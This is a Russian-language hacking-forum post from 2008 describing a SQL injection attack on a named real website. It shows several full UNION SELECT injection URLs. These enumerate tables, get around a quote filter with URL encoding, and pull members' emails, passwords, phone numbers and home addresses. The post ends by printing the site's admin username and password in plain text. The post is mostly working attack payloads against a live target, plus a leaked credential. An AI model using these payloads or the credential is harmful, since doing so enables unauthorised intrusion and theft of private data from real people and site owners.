|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Итак, вот что мне удалось обнаружить.
С помощью нехитрой фишки "TABLE_NAME", обнаруживаем 2 интересные таблицы под названиями "members" и "admin"
Надо было выяснить название колонок с помощью "COLUMN_NAME", я попробовал так:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='members'/*
Но не тут-то было, кавычки фильтруются, но как оказалось не совсем =)) А вот так:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%27members%27/*
Всё работает замечательно.
Достаём интересные данные, из таблицы "members" под названиями "email" - мыло, "adresa" - домашний адрес, "parola" - типа так они пароль обозначили. "telefon" - домашний телефон.
Ну собственно выводим их:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(email,0x3a,parola,0x3a,telefon,0x3a,adresa),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+members+limit+1,1/*
В итоге "мыло:пасс:телефон:адрес" жаль цикл не пашет ;(
Теперь дальше самое интересное, таблица "admin" интересные колонки это username, и собственно parola
Выводим:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(username,0x3a,parola),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+admin+limit+0,1/*
И получаем данные для админки: bbw:qazxcv
В админке ковыряться не стал - не интересно.
Последний раз редактировалось Nightmarе; 02.08.2008 в 05:49..
|